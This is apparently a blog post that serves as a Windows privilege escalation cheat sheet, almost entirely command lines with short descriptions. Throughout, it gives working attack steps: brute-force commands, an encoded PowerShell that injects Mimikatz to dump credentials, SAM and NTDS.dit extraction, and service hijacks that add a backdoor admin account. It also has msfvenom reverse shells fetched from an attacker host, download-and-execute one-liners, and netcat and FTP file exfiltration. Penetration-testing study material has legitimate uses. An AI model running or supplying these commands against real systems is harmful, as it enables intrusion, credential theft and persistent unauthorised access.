Windows
Privilege escalation or vertical privilege escalation means elevating access from a limited user
by abusing misconfigurations, design flaws, and features within the windows operating system.
by abusing misconfigurations, design flaws, and features within the windows operating system.
- Operating System
- Patch Level
- Command# Systeminfo (after executing systeminfo copy the results and paste it into a new file locally)
- Info: The results from the systeminfo command can then be feed to Windows-Exploit-Suggester, Windows-Exploit-Suggester will attempt to identify local privilege escalation exploits
- Reference: Windows-Exploit Search Tool https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
- Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1""");Find-AllVulns
- Info: Sherlock.ps1 is a powershell script which can identify local privilege escalation vulnerabilities (very useful)
- Info: Supported versions vista - Windows 10
- Reference: https://github.com/rasta-mouse/Sherlock
- Info: To compile windows exploits, install mingw32 mingw-w64 mingw32-binutils tools
- Info: To compile Win32 bit executables, execute i686-w64-mingw32-gcc -o <file>.exe <file>.c
- Info: To compile Win64 bit executables, execute x86_64-w64-mingw32-gcc -o <file>.exe <file>.c
- Info: To Compiled .cpp source file, execute i586-mingw32msvc-g++ -o <file>.exe <file>.cpp
- Info: To compile python scripts, install pyinstaller,
- Info: pip install https://github.com/pyinstaller/pyinstaller/tarball/develop and then execute pyinstaller --onefile <your_script_name>.py
- Reference: Kernel Exploits https://github.com/SecWiki/windows-kernel-exploits
- Compile: cs CSharp files
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /reference:System.IO.Compression.dll /out:<file.exe> <source.cs>
- User
- Groups
- Privileges
- Command# whoami /all
- Info: The results from whoami /all provides user information, group information, and privileges. There are times when admins may assign special group access to perform certain tasks, which may lead to privilege escalations
- Info: The following privileges are useful to obtain privilege escalations, through token manipulation attacks. This attack should be performed when logged in as a network service, such as IIS or SQL
- Info: For Windows XP - Vista & Windows Server 2003 - 2008, use Chrurrasco.exe
- Download: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
- Reference: https://simonuvarov.com/privilege-escalation-via-token-kidnapping/
- SeImpersonate privilege
- SeAssignPrimaryToken Privilege
- SeDebugPrivilege
- Token Hijacking
- Reference: https://blog.netspi.com/tokenvator-a-tool-to-elevate-privilege-using-windows-tokens/
- Reference: https://github.com/0xbadjuju/Tokenvator/releases/download/v1.3.0/Tokenvator.exe
- Info: Useful tool to elevate access
- Reference: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-OSTokenInformation.ps1
- Info: Useful tool to enumerate tokens
- Reference: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-TokenPrivs.ps1
- Info: Useful tool to enumerate tokens per pid
- Info: Elevate to Admin access from SQL account
- Reference: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
- Info: Local Privilege Escalation from Windows Service Accounts to SYSTEM
- Reference: ProcessPerms-64bit https://goo.gl/HxzwDp
- Reference: ProcessPerms-32bit https://goo.gl/75P6Qq
- Info: Useful tool to enumerate token information and integrity levels of processes, look for processes running as system with untrusted, medium levels to inject code
- Password Policy
- Command# net accounts
- Info: The net accounts command provides information about the password policy including, account lockout information
- Remote Password Attacks
- Reference: https://www.thehackr.com/create-custom-word-lists-using-cewl/
- Info: Cewl can crawl websites to find interesting names and then outputs into a password dictionary file
- Command# @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
- Command# @FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ > NUL
- Command# medusa -U users -P <password list> -t 10 -h <host> -e ns -F -M <ssh | ftp>
- Command# medusa -u sa -P <path to password dictionary> -t 10 -h <host> -e ns -F -M mssql -n 1433
- Info: Medusa is remote bruteforce tool <Brute-forcing passwords should be used if "NOTHING" works, last approached after attempting exploits>
- Command# ncrack -vv –user <user> -P <path to password dictionary> –connection-limit 1 rdp:/<remote ip>
- Info: ncrack is a remote bruteforce tool that can bruteforce rdp logins <Brute-forcing passwords should be used if "NOTHING" works, last approached after attempting exploits>
- Command# hydra -P password-file.txt -v $ip snmp
- Info: Hydra brute force against SNMP
- Command# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
- Info: Hydra FTP known user and password list
- Command# hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
- Info: Hydra SSH using list of users and passwords
- Command# hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh
- Info: Hydra SSH using a known password and a username list
- Command# hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
- Info: Hydra POP3 Brute Force
- Command# hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
- Info: Hydra SMTP Brute Force
- Command# hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
- Info: Hydra attack http get 401 login with a dictionary
- Command# hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
- Info: Hydra attack Windows Remote Desktop with rockyou
- Command# hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
- Info: Hydra brute force a Wordpress admin login
- Local Password Attacks (require administrative access>
- Command# powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
- Info: Injects Mimikatz in memory and dump creds
- Command# procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
- Command# mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
- Info: Procdump can be used dump contents from lsass and then mimikatz can be used to extract passwords offline
- Command# C:\> reg.exe save hklm\sam c:\temp\sam.save
- Command# C:\> reg.exe save hklm\security c:\temp\security.save
- Command# C:\> reg.exe save hklm\system c:\temp\system.save
- Info: dump password contents to disk
- Command: secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
- Info: secretsdump.py can be used to retrieve ntlm hashes
- Reference: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
- Command# ./hate_crack.py usage: python hate_crack.py <hash_file> <hash_type>
- Reference: https://github.com/trustedsec/hate_crack
- Command# .\Invoke-NinjaCopy.ps1 -path "c:\windows\system32\config\system" -localdestination "c:\system"
- Command# .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\<file-path\sam"
- Command# .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\security" -LocalDestination "c:\security"
- Info: Invoke-NinjaCopy can be used to retrieve password contents when files are locked
- Reference: https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
- Reference: ntds_decode.exe https://goo.gl/bpdv9d
- Command# vssadmin create shadow /for=C:
- Command# copy \\?GLOBALROOT\Device\Harddisk\VolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
- Command# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
- Info: volume shadow copy utility, vssadmin can be used to retrieve ntdis.dit and system which contains domain passwords stored on domain controllers
- Command# python esedbxtract.py -n ntds.dit -s system
- Info: A script to extract password hashes from a domain controller using the NTDS.dit file and SYSTEM hive.
- Reference: https://bitbucket.org/grimhacker/esedbxtract
- Command# pth-winexe --user=<domain/workgroup>/<user>%<ntlm hash> //<remote ip> cmd
- Command# wce.exe -s <computer name>:<user>:<ntlm hash>
- Info: Pass The Hash, technique wce supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).
- Info: Pass The Hash Tools http://chousensha.github.io/blog/2015/04/04/kali-tools-catalog-password-attacks/
- Reference: http://cracker.offensive-security.com/
- Reference: https://hashkiller.co.uk/md5-decrypter.aspx
- Reference: https://crackstation.net/
- Info: Online services to crack hashes
- Command# sudo apt-get install fcrackzip
- Commnad# fcrackzip –u –D –p ‘dictionary file’ ‘zip file’
- Info: Bruteforce password protected zip files
- Services (running with higher privileges)
- Permissions on Services
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/accesschk.exe','accesschk.exe')
- Reference: https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
- Info# Check for read and write permissions on windows services
- accesschk -kwsu <hostname>\<privusr> hklm\system\currentcontrolset\services
- Info# modify vulnerable service
- red add HKLM\SYSTEM\CurrentControlSet\Services\<vulnerable_service> /v ImagePath /d "c:\temp\payload.exe"
- Info: XP requires Accesschk version 5.2
- Command# accesschk.exe -uwcqv *
- Info: Executing accesschk -uwcqv will check for accounts with modifiable permissions
- Command# sc qc "vuln-service"
- Command# sc config "vuln-service" binpath= "net user backdoor P@$$w0rd123! /add"
- Command# sc stop "vuln-service"
- Command# sc start "vuln-service"
- Command# sc config "vuln-service" binpath= "net localgroup administrators backdoor /add"
- Command# sc stop "vuln-service"
- Command# sc start "vuln-service"
- Comnand# sc stop <vuln-service>
- Command# sc config <vuln-service> binPath= "<file path to reverse shell executable>" depend= "" start= demand obj= ".\LocalSystem" password= ""
- Command# sc start <vuln-service>
- Info: If the logged in user has modifiable permissions on a service running with higher access, execute the sc qc command on the writable service, (the results from sc qc will include the service configuration, which contains the binary used, and the account used to run the service
- Permissions on Service Executables
- Command# icacls "<file path>"
- Info: The results from the sc qc command will show the service executable, after identifying the file path, execute icacls on the file path to show the permissions
- Command# On the attacker box execute msfvenom -p windows/shell_reverse_tcp lhost= lport= -f exe -o <name of the service to replace>
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/<service-executable.exe','service-executable.exe')
- Info: Replace the windows service executable with a reverse shell
- Unquoted Windows Service Paths
- Command# wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
- Info: After executing the command shown above look for the file path which contains the executable
- Info: Use icacls "<file path> to check the permissions and look for modifiable permissions
- Command# icacls "C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ovpnagent.exe"
- Info: If the user does not have permissions to modify the executable, continue searching based on the first word within the directories specified and implant an executable, then name it according to there sub directories tell the user has modifiable permissions, then drop a reverse shell in its directory
- Command# icacls "C:\"
- Command# msfvenom -p windows/shell_reverse_tcp lhost=<attacker_ip> lport=<attacker_listeningport> -f exe -o Program.exe
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Progam.exe')
- Command# icacls "C:\Program Files (x86)\"
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Program Files (x86)\OpenVPN.exe')
- Command# icacls "C:\Program Files (x86)\OpenVPN Technologies\"
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel.exe')
- Services Containing Orphaned DLLs
- Info: Known Services with orphaned dlls
- Windows 7 32/64 bit
- IKE and AuthIP IPsec Keying Modules (IKEEXT) – wlbsctrl.dll
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker-ip>/Ikeext-Privesc.ps1','Ikeext-Privesc.ps1')
- Reference: https://goo.gl/bKJbW9
- Info: Automatically detects and exploits the IKE and AuthIP IPsec Keyring Modules Service
- The exploit creates a user called backdoor with password p@$$w0rd123! and assigns it to the local administrators group
- Windows Media Center Receiver Service (ehRecvr) – ehETW.dll
- Windows Media Center Scheduler Service (ehSched) – ehETW.dll
- Info: The Windows Media Center Services startup type is set to manual and status not started It will only elevate to Network service privileges, from here it would be good to hijack a token using the lonley potato technique
- Info: Windows Media Center Services can be started through the following scheduled tasks.
- schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\mcupdate"
- schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\MediaCenterRecoveryTask"
- schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\ActivateWindowsSearch"
- Windows XP
- Automatic Updates (wuauserv) – ifsproxy.dll
- Remote Desktop Help Session Manager (RDSessMgr) – SalemHook.dll
- Remote Access Connection Manager (RasMan) – ipbootp.dll
- Windows Management Instrumentation (winmgmt) – wbemcore.dll
- Additional Vulnerable Services
- Audio Service (STacSV) – SFFXComm.dll SFCOM.DLL
- Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) – DriverSim.dll
- Juniper Unified Network Service(JuniperAccessService) – dsLogService.dll
- Encase Enterprise Agent – SDDisk.dll
- Reference: https://www.greyhathacker.net/?p=738
- Info: Check Permissions on folders that are used in part of the default search order
- DLL Hijacking
- Current Directory Exploitable
- and folder in %PATH% Exploitable
- Note: Locating Missing DLLS
- Load Procmon
- include .dll
- include NAME NOT FOUND
- include folder in path
- Note: C:\windows\system32 (limited users usually do not have access to write to this directory)
- C:\Windows\system (limited users usually do not have access to write to this directory)
- C:\windows (limited users usually do not have access to write to this directory)
- Note Locating Implant Folders
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/ankh2054/windows-pentest/master/Powershell/folderperms.ps1','C:\folderperms.ps1')
- Command# powershell -ep bypass .\folderperms.ps1
- Info: PowerShell script to automatically detect writable directories stored in %path%
- Command: echo %path%
- Info: echo %path% will print out the directories stored in the system or the user path
- Info: Once a directory is found, implant a dll that creates a user and adds the user to the local administrators group
- Reference: https://github.com/newsoft/adduser/blob/master/adduser.c
- Note Check Permissions On Files And Folders
- Command# accesschk.exe -qwsu "Authenticated Users" *
- Command# accesschk.exe -qwsu "Everyone" *
- Command# accesschk.exe -qwsu "Power Users" *
- Runtime DLL Names
- Reference: https://en.wikipedia.org/wiki/Microsoft_Windows_library_files
- Info: Runtime DLL can be used to load DLLs by rename backdoors according to there names, such as msvcr100.dll. Any processes compiled with Visual Studios C++ will load this dll.
- Scheduled Tasks (running with higher privileges)
- Command: schtasks
- Info: Prints out timestamps for scheduled tasks
- Command: schtasks /query /fo LIST /v
- Info: Prints out scheduled tasks configuration including executables, with file paths Useful in identifying executables that can be modified
- Command# cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
- Info: Filter down to tasks that are running as system
- Info: Take note on scheduled tasks that run on ONLOGON and ONSTART, as these will be initiated by the system, and allow elevated access
- Command# schtasks /end /tn <task name>
- Info: Ends a scheduled task
- Command# schtasks /run/tn <task name>
- Info: Runs a scheduled task
- Reference: MS10-092 Task Scheduler exploit https://goo.gl/cM12Ku
- Info: MS10-092 Task Scheduler zero day exploit, creates user backdoor with password p@$$w0rd123! and assigns it to the local administrators group
- Info: Supporting OS Windows 7/2008 x86/x64
- Command: AT xx:xx <24 hour> /Interactive cmd.exe
- Info: On XP systems the AT command can be abused to gain system access, however the attack requires administrative access.
- AutoStart Process (running with higher privileges)
- Modifiable AutoRun Binaries/Scripts in registry
- Command: autorunsc.exe -a | findstr /n /R "File\ not\ found"
- Reference: https://goo.gl/i2rddj
- Info: Autorunsc should be downloaded from the reference link, it is useful to identify missing files that can be used to implant a backdoor
- Info: Once the file is identified use icacls to check the permissions against the default search order, start with the current working directory then
- C:\Windows\System32
- C:\Windows\
- Current Working Directory
- %path%
- Installed Applications
- Command# wmic product get name,version /format:csv
- Info: Lists installed products in a csv format, locate the version info and search google.com to see if there are vulnerabilities associated with them.
- Installed Drivers
- Command# DRIVERQUERY
- Interesting Files Containing Creds
- Command# dir /s access.log error.log
- Info: Find Apache web logs
- Command# dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
- Info: Find XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP configuration files
- Command# dir /a C:\inetpub\
- Command# type C:\Windows\System32\inetsrv\config\applicationHost.config
- Info: Find IIS Inetpub Files
- Command#
- Command# findstr /si password *.txt
- Command# findstr /si password *.xml
- Command# findstr /si password *.ini
- Command# dir /s sysprep.inf sysprep.xml unattended.xml unattend.xml unattend.txt 2>nul
- Command# dir /b /s vnc.ini ultravnc.ini 2>nul
- Command# dir /s *pass* == *cred* == *vnc* == *.config*
- Command# findstr /spin "password" *.*
- Command# dir /b /s Groups.xml Drives.xml DataSources.xml Printers.xml Services.xml ScheduledTasks.xml 2>nul
- Info# CD c:\windows\sysvol and check group these group policy prefences
- Command# icacls %SYSTEMROOT%\repair\SAM
- Command# icacls %SYSTEMROOT%\System32\config\RegBack\SAM
- Command# icacls %SYSTEMROOT%\System32\config\SAM
- Command# icacls %SYSTEMROOT%\repair\system
- Command# icacls %SYSTEMROOT%\System32\config\SYSTEM
- Command# icacls %SYSTEMROOT%\System32\config\RegBack\system
- Info: Decrypt Group Policy Preference Files with gp3finder -D <cpassword>
- Reference: https://goo.gl/NHF3nP
- Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1""");Get-GPPPassword
- Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1""");Get-GPPPassword -Server <computer domain name>
- Info: Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
- Command# cmdkey /list
- Info: List cached credentials in the Credential Manager Database
- Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1""");Get-VaultCredential
- Info: Displays Windows vault credential objects including cleartext web credentials
- Interesting Data Stored In The Registry
- Command# reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Info: The AlwaysInstallElevated value makes it possible to execute backdoor msi under system
- Command# reg query "HKCU\Software\ORL\WinVNC3\Password"
- Info: Checks for VNC passwords in the registry (Requires Admin Access)
- Command# reg query "HKLM\SOFTWARE\Microsoft\Windows (NT\Currentversion\Winlogon"
- Info: Checks for AutoLogin Creds
- Command# reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
- Info: Checks SNMP passwords (Requires Admin Access)
- Command# reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
- Info: Checks Putty Credentials (Requires Admin Access)
- Command# reg query HKLM /f password /t REG_SZ /s
- Command# reg query HKCU /f password /t REG_SZ /s
- Info: Search for password in registry
- DLL Injection
- Reference: ProcessPerms-64bit https://goo.gl/HxzwDp
- Reference: ProcessPerms-32bit https://goo.gl/y6pVAk
- Info: Useful tool to enumerate token information and integrity levels of processes, look for processes running as system :with medium levels to inject code
- Commnad# RemoteDLLInjector64.exe <pid> <filepath>
- Reference: https://goo.gl/Ha8cB4 (RemoteDLLInjector64.exe(
- Command# RemoteDLLInjector32.exe <pid> <filepath>
- Reference: https://goo.gl/G6y7fR (RemoteDLLInjector32.exe)
- Command# ProcessPerms-64bit.exe or ProcessPerms-32bit.exe
- Reference: https://github.com/Cybellum/DoubleAgent
- Info: DoubleAgent Zero Day Code Injector
- Reference: https://github.com/theevilbit/injection (Cool Injection Techniques)
- Networking
- Command# ipconfig /all
- Info: List IP Configuration
- Command# ipconfig /displaydns
- Info: Display dns cache
- Command# netstat -ano
- Info: List listening network services
- Command# ping x.x.x.255
- Command# arp -a
- Info: Ping network address and then use arp -a to identify other systems on the network
- Info: arp -a also prints out mac addresses, which can be used for spoofing techniques
- Command# route print
- Info: Print routing information
- Command# netsh dump
- Info: Dump network configuration
- Command# netsh firewall show state
- Command# netsh firewall show config
- Command# netsh advfirewall firewall show rule name=all
- Info: Display firewall configuration
- Command# reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
- Info: Display SNMP configuration
- Command# net share
- Info: After listing shares use icacls to check their permissions
- Command: type C:\WINDOWS\System32\drivers\etc\hosts
- File Transfer Techniques
- Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/nc.exe','nc.exe')
- Command# nc -w 10 <destination_ip> <port> < <file>
- Command# nc -lvp <port> > <flle>
- Info: Send file to and receive file
- Reference: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
- Command# echo open <attacker IP> 21> ftp.txt
- Command# echo USER username password >> ftp.txt
- Command# echo bin >> ftp.txt
- Command# echo GET <file.exe> >> ftp.txt
- Command# echo bye >> ftp.txt
- Command# ftp -s:ftp.txt
- Info: On Restricted systems echo can be used to echo commands to a ftp transfer script. To send files to the attack change GET to put
- Command# pip install wsgidav cheroot
- Info: Install wsgidav on the attacker machine and mkdir /tmp/transfer_files, then chmod -R 7777 /tmp/transfer_files
- Command# wsgidav --host=0.0.0.0 --port=80 --root=/tmp/transfer_files
- Info: On the attacker machine start wsgidav service
- Command# net use <drive_letter> http://<attacker ip>/
- Info: On the target computer mount the share of the attacker
- Remote Port Forwarding
- Command# plink.exe -l <attacker_username> -pw <attacker_password> -C -R <port-to-remote-forward>:<dual-homed-transfer-ip>:<port-to-listen-on> <attacker_ipaddress>
- Example: plink.exe -l root -pw root -C -R 135:10.10.102.103:135 10.10.102.56
- Info: Pivoting off a system that is dual homed in a restricted network can be used to forward ports to systems within that network
- Tunneling
- UAC LPE Bugs
- Command# strings –s *.exe | findstr /i autoelevate
- Info: Finds AutoElevate Executables
- Command# IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/UAC-TokenMagic.ps1");UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -ProcID <proc id of evelated privileges>
- Reference: https://decoder.cloud/2017/02/03/bypassing-uac-from-a-remote-powershell-and-escalting-to-system/
- Reference: https://goo.gl/52yKdx
- Info: https://github.com/yanncam/LPE_AT-UAC
- Reference: https://goo.gl/ryX4X3
- Info: Windows 10 UAC Bypass
- Command# powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/NcAFPK');Invoke-WScriptBypassUAC -payload " "
- Reference: https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1
- Reference: https://gist.github.com/Disguisenberg
- Info: UAC LPE Attacks usually requires RDP access, Graphical Enivorment
- PowerShell Applocker Bypass
- OS Specific LPE Attacks
- Reference# https://blog.netspi.com/get-sql-server-sysadmin-privileges-local-admin-powerupsql/
- Reference# http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
- Reference# https://github.com/3ndG4me/AutoBlue-MS17-010
- Info: Eternalblue exploits SMBv1 and SMBv2
- Info: Windows Targets:
- Windows 7 SP1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x86
- Windows 2008 SP1 x64
- Windows 2008 SP1 x86
- Reference# https://www.exploit-db.com/exploits/21072/
- Info: A vulnerability exists in Microsoft's Internet Information Services 5.0 which could allow a user with write permission to run any code with System privileges.
- NTLM Authentication Spoofing Attack
- Command# powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/fVC1Yd'); Invoke-Tater -Trigger 2 -Command ""net user tater backdoor p@$$w0rd123! /add && net localgroup administrators tater /add"""
- Info: On Windows 10 -Trigger 2 is needed, Hot Potato Windows Privilege (NTLM authentication spoofing over http)
- Command# powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/fVC1Yd'); Invoke-Tater -Trigger 1 -Command ""net user tater backdoor p@$$w0rd123! /add && net localgroup administrators tater /add"""
- Reference: https://github.com/Kevin-Robertson/Tater
- Command# Win10 change -Trigger 2
- Command# rottenpotato64bit.exe * reverseshell.bat
- Reference: https://goo.gl/AN6pEq
- Info: Standalone version of rotten potato, does not require meterpreter
- Reference: https://github.com/decoder-it/lonelypotato
- Reference: https://labs.mwrinfosecurity.com/blog/incognito-v2-0-released/
- Reference: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
- Command: Potato.exe -ip 127.0.0.1 -cmd "net localgroup Administrators Test /add" -disable_exhaust true
- Reference: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
- Elevating Administrator To System
- Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -Enumerate
- Info: This script requires Administrator privileges, Requires PowerShell Session, will enumerate available account that can be manipulated
- Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"
- Info: This script requires Administrator privileges, Requires PowerShell Session, will enumerate available account that can be manipulated
- Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
- Info: This script requires Administrator privileges, Requires PowerShell Session, Uses named impersonate to elevate the current thread token to SYSTEM with a custom service and pipe name, requires SeImpersonatePrivilege
- Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System -Technique Token
- Info: This script requires Administrator privileges, Requires PowerShell Sessions, Uses token duplication to elevate the current thread token to SYSTEM, requires SeDebugPrivilege
- Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System
- Info: This script requires Administrator privileges, Requires PowerShell Session, Uses named impersonate to elevate the current thread token to SYSTEM, requires SeImpersonatePrivilege
Automation Scripts
- Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1""");Invoke-HostEnum -ALL
- Info: Windows Privilege Escalation Enumeration Script
- Reference:Windows Priv ToolBox, https://goo.gl/ZX2zAY, https://goo.gl/xYFi41 (ToolBox)
- Info: https://github.com/GhostPack
Pentesting Tools
https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs
Info: Living Off The Land Executables
https://github.com/api0cradle/LOLBAS
Info: DLL-Hijack scannerhttps://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs
Info: Living Off The Land Executables
https://github.com/api0cradle/LOLBAS
https://github.com/Cybereason/siofra
winrs https://ss64.com/nt/winrs.html
Resources:
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
Info: Common Windows DLLs Used for DLL Hijacking
http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
Info: Useful Red Team TIPS
https://github.com/vysec/RedTips/blob/master/README.md
Info: Restoring Active Directory from ntds.dit file, load into read only domain controller
https://www.dell.com/support/article/us/en/19/sln289101/windows-server-active-directory-database-repair-after-domain-controller-failure?lang=en
Info: Offline AD attacks
https://www.dsinternals.com/wp-content/uploads/HIP_AD_Offline_Attacks.pdf
Red Team Tips
Impersonating TrustedInstaller
Import-Module = https://github.com/google/sandbox-attacksurface-analysis-tools/blob/master/NtObjectManager/NtObjectManager.psm1
execute:
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
Info: Common Windows DLLs Used for DLL Hijacking
http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
Info: Useful Red Team TIPS
https://github.com/vysec/RedTips/blob/master/README.md
Info: Restoring Active Directory from ntds.dit file, load into read only domain controller
https://www.dell.com/support/article/us/en/19/sln289101/windows-server-active-directory-database-repair-after-domain-controller-failure?lang=en
Info: Offline AD attacks
https://www.dsinternals.com/wp-content/uploads/HIP_AD_Offline_Attacks.pdf
Red Team Tips
Impersonating TrustedInstaller
Import-Module = https://github.com/google/sandbox-attacksurface-analysis-tools/blob/master/NtObjectManager/NtObjectManager.psm1
execute:
- Set-NtTokenPrivilege SeDebugPrivilege
- Start-Service TrustedInstaller ("Any Service you want to impersonate")
- $p = Get-NtProcess -Name TrustedInstaller.exe (Any Process you want to impersonate or the service process you initiated from step2)
- $t = $p.OpenToken()
- $t.Groups | Where-Object {$_.Sid.Name -math "TrustedInstaller"} (Queires Sid of Target)
- $proc = New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p
No comments:
Post a Comment